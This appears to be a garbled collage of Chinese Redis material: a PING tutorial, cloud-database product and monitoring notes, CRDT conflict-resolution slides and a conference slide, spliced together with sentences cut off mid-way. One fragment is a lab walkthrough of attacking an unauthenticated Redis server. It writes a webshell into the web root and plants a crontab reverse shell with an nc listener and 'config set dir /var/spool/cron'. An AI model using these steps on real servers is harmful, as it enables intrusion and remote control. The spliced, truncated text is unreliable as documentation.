命令格式的描述已经⾜够多了， 现在让我们来看⼀个实际的例⼦。 Redis 的 PING 命令接受⼀ 条可选的消息作为参数， 这个命令通常⽤于测试客户端和服务器之间的连接是否正常： PING [message] 如果⽤户以⽆参数形式执⾏这个命令， 那么服务器在连接正常的情况下， 将向客户端返回 "PONG" 作为回复： 127.0.0.1:6379> PING PONG 但是， 如果⽤户给定了可选的消息， 那么服务器将原封不动地向客户端返回该消息： 127.0.0.1:6379> PING "hello world" "hello world" 另⼀⽅⾯， 如果服务器与客户端的连接不正常， 那么客户端将返回⼀个错误： -- 客户端未能连接服务器，返回⼀个连接错误 127.0.0.1:6379> PING Could not connect to Redis at 127.0.0.1:6379: Connection 对于代码清单 1-1 中 展示的连接检查脚本 check_connection.py 来说， 该⽂件就位于 /introduction ⽂件夹中： 代码清单 1-1 检查连接的脚本：/introduction/check_connection.py from redis import Redis client = Redis() # ping() ⽅法在连接正常时将返回 True if

unlink 在 Redis 4.0 之前，redis 执行 del 命令会在释放掉 key 的所有内存以后才会返回 OK。如果 key 比较大（比 如说一个 hash 里有1000万条数据），其他连接可能要等待很久。为了兼容已有的 del 语义，Redis 4.0 引入 unlink 命令，效果以及用法和 del 完全一样，但内存释放动作放到后台线程中执行。 flushdb/flushall yes/no lazyfree-lazy-expire yes/no 云数据库 Redis 版 产品简介 3 swapdb swapdb 命令会交换两个 db 的数据，swapdb 执行之后用户连接 db 无需再执行 select，即可看到新的数据 。 zlexcount zlexcount 命令用于 sorted set 中，和 zrangebylex 类似，不同的是 zrangebylex Redis 原生复制的弊端。 Redis 原生复制弊端简要如下： Redis 复制中断后，Slave 会立即发起 psync，psync 尝试部署同步不成功，就会 全量同步 RDB 并发送至 Slave 节点。 如果 Redis 全量同步，会导致主节点执行全量备份，进程 Fork，可造成主节点达 到毫秒或秒级的卡顿。 Redis 进程 Fork 导致 Copy-On-Write

Redis 版 快速入门 快速入门 文档目的 快速入门旨在介绍如何创建 Redis 实例以及连接实例数据库，使用户能够了解从购买 Redis 实例到开始使用实 例的流程。 目标读者 首次购买 Redis 实例的用户 想要了解如何连接 Redis 实例的用户 快速入门流程图 若您初次使用云数据库 Redis 版，请先了解使用限制以及关于 KBytes/s。 OutFlow 后端 Redis 出口当前每秒的流量值，单位为 KBytes/s。 ConnCount 当前 Redis 的客户端连接个数。 FailedCount 对于主从版本，目前这个值没有意义，因为客户端 直接连接到后端 DB。对于集群版实例，该统计项 标识 Proxy 到 Redis 的操作失败数目，包括超时 云数据库 Redis 版 快速入门 3 说 选择左侧导航栏的报警设置，单击报警设置按钮跳转到云监控的设置页面。 您可以根据指引创建 Redis 的监控。对于集群实例建议添加所有实例的内存监控，这样可以对集群实例的子节 点的内存进行监控，告警设置如下： 、连接断开等异常引起的操作异常的数目。 对于部分旧版本的 Redis，该值为一个历史值，对 于这种情况如果 FaileCount 没有增加则没有问题 。对于新版本，该值为每秒的一个统计均值。后续 会都升级成每秒的统计均值。

replicas, and where it is always mathematically possible to resolve inconsistencies which might result. 并发冲突 举个栗子: LWW(Last Writer Wins)-Register: 适用于 K/V 类型的存储 解决数据冲突的方式是通过使用 unix timestamp 或类似自然时间的计数 None 并发冲突的场景 Data Type: Strings Use Case: Concurrent SETs Conflict Resolution: Last Write Wins (LWW) Redis String 正常同步的场景 Data Type: Maps Use Case: Common HSET Conflict Resolution: None 并发冲突的场景 - Concurrent HSET Conflict Resolution: ADD WINS Redis Map 并发冲突的场景 - 2 Data Type: Maps Use Case: Concurrent HSET Conflict Resolution: LWW – Last Write Wins 并发冲突的场景 - 3 Data Type: Maps Use Case: Concurrent HSET

未授权访问漏洞 Hadoop 未授权访问漏洞 Jupyter Notebook 未授权访问漏洞 攻击机: Windows10 目标靶机: Centos7 ip地址: 192.168.18.138 连接工具:Xshell wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzvf redis-2.8.17.tar.gz 利用redis写webshell 靶机网站路径：/var/www/html/ 这里我们调出Console 利用前提： 靶机redis未授权，在攻击机能用redis clinet连接，如上图，并未登录验证 靶机开启web服务，并且知道网站路径，还需要具有文件读写增删改查权限 由于本地搭建，我们已经知道网站路径，我们把shell写入/var/www/html/目录下： webshell "" save 访问test.php 利用crontab反弹shell 端口监听： 在攻击机上监听一个端口（未被占用的任意端口): 连接redis，写入反弹shell nc -lvnp 5555 redis-cli.exe -h 192.168.18.138 config set dir /var/spool/cron set

ight/ 下 载 链 接 ： h�ps://download.redisinsight.redis.com/latest/RedisInsight-v2-win- installer.exe 连接时不用写username，只写密码

Conference China 2016 中国用户大会 可以读取数据库以外的文件，比如 .csv 和 .txt 01 接口稳定，可以进行二次开发，使用方便 02 丰富的插件，支持各种异构DB的连接，如Oracle，Mysql，Redis，Mongodb 03 2016Postgres中国用户大会 Postgres Conference China 2016